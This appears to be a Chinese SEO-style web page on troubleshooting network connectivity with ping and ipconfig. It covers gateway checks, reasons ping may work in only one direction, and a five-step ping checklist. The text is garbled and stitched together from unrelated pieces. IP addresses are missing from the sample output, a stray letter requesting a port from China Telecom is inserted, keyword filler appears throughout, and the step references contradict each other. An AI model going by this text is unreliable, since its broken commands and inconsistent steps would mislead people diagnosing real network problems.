c:\\\\Documents and Settings\\\\Administrator>ping Pinging with 32 bytes of data: Reply from : bytes=32 time
这一命令可以检测本机能否正常访问Internet。比如本地电信运营商的IP地址为:。在MS-DOS方式下执行命令:Ping ,如果屏幕显示:
c:\\\\Documents and Settings\\\\Administrator>ping Pinging with 32 bytes of data: Reply from : bytes=32 time=2ms TTL=250 Reply from : bytes=32 time=2ms TTL=250 Reply from : bytes=32 time=3ms TTL=250 Reply from : bytes=32 time=2ms TTL=250 Ping statistics for : Packets: Sent = 4, Received = 4, Lost = 0 (0% lo), Approximate round trip times in milli-seconds: Minimum = 2ms, Maximum = 3ms, Average = 2ms 则表明运行正常,能够正常接入互联网。反之,则表明主机文件(windows/host)存在问题。
4.检查您的计算机到网关之间的线路
在命令提示符窗口下输入ipconfig命令,将返回您的计算机在网络上的IP地址(IP Addre)、子网掩码(Subnet Mask)及网关(Default Gateway),而在IP 如果您的计算机使用的是自动获取IP,adcre后面显示的是的IP地址则您的计算机并没有从DHCP服务器上获取到可用的计算机IP地址。这时可以使用命令ipconfig /renew重新获取一下IP(win98/me使用ipconfig/renew_all),一般情况下都可以获取得正确的IP地址,当然前提是DHCP服务器正常。如果一直获取不到正确的IP地址,这时则要检查一下是否防火墙软件阻挡了网卡的通信,如Windows XP的防火墙。
获取到正确的IP地址、子网掩码及网关地址后,就可以使用Ping工具来探测本地计算机和网关之间是否连通了。运行命令Ping 网关地址后,如果返回的结果正常,而IE依然打不开网页,这个时候就应该进行第4步工作了。如果返回的结果不正常,则说明您的计算机和网关主机网络不正常。此时如果是Adsl用户则需要向运营商打电话救助,让他们检查自己的服务器是否出现了故障。如果是局域网用户,则需要向网管求助,让他检查网络的交换设备及网关服务器是否工作正常。
从Ping的工作过程,我们可以知道,主机A收到了主机B的一个应答包,说明两台主机之间的去、回通路均正常。也就是说,无论从主机A到主机B,还是从主机B到主机A,都是正常的。那么,是什么原因引起只能单方向Ping通的呢?
一、安装了个人防火墙
在共享上网的机器中,出于安全考虑,大部分作为服务器的主机都安装了个人防火墙软件,而其他作为客户机的机器则一般不安装。几乎所有的个人防火墙软件,默认情况下是不允许其他机器Ping本机的。一般的做法是将来自外部的ICMP请求报文滤掉,但它却对本机出去的ICMP请求报文,以及来自外部的ICMP应答报文不加任何限制。这样,从本机Ping其他机器时,如果网络正常,就没有问题。但如果从其他机器Ping这台机器,即使网络一切正常,也会出现“超时无应答”的错误。
二、错误设置IP地址
正常情况下,一台主机应该有一个网卡,一个IP地址,或多个网卡,多个IP地址(这些地址一定要处于不同的IP子网)。但对于在公共场所使用的电脑,特别是网吧,人多手杂,其中不泛有“探索者”。曾有一次两台电脑也出现了这种单方向Ping通的情况,经过仔细检查,发现其中一台电脑的“拨号网络适配器”(相当于一块软网卡)的TCP/IP设置中,设置了一个与网卡IP地址处于同一子网的IP地址,这样,在IP层协议看来,这台主机就有两个不同的接口处于同一网段内。当从这台主机Ping其他的机器时,会存在这样的问题:
(1)主机不知道将数据包发到哪个网络接口,因为有两个网络接口都连接在同一网段;
(2)主机不知道用哪个地址作为数据包的源地址。因此,从这台主机去Ping其他机器,IP层协议会无法处理,超时后,Ping 就会给出一个“超时无应答”的错误信息提示。但从其他主机Ping这台主机时,请求包从特定的网卡来,ICMP只须简单地将目的、源地址互换,并更改一些标志即可,ICMP应答包能顺利发出,其他主机也就能成功Ping通这台机器了。
ping端口号共5
申请书
中国电信:
兹有我公司办公电脑远程需申请8080的端口,我公司服务器的IP是::8080
ping端口号共6
1 ping
通:操作系统TCP/IP功能完好
不通:重新给系统安装TCP/IP(类Unix OS不会出现这种状况)
2 ping 本地ip
使用DHCP时,先使用ipconfig查看,若有ip,则正常,且说明局域网物理链路正常。此时ping这个ip,通则说明网卡工作正常。
不通:重新安装网卡驱动
3 ping 局域网其他机器(多ping几台机器)
通:局域网TCP/IP工作正常
不通:检查线路
检查Hub,Switcher
看对方机器是否将ICMP回应关掉
4 ping 网关
通:到网关是OK的,如果不能上网,那就是网关的问题(比如网关将此机器屏蔽,网关到Internet的链接有问题)
不通:按4检查
(此时,就可以上网了,QQ什么的就可以用了,因为这种东西一般直接用ip) 5 ping DNS
通:全部OK
不通:换一个DNS
本地DNS未设置(DHCP:没有进行DNS透传,手动设定吧)
ping端口号共6篇(Ping 端口号)相关文章:
相关热词搜索:ping端口号(共10篇)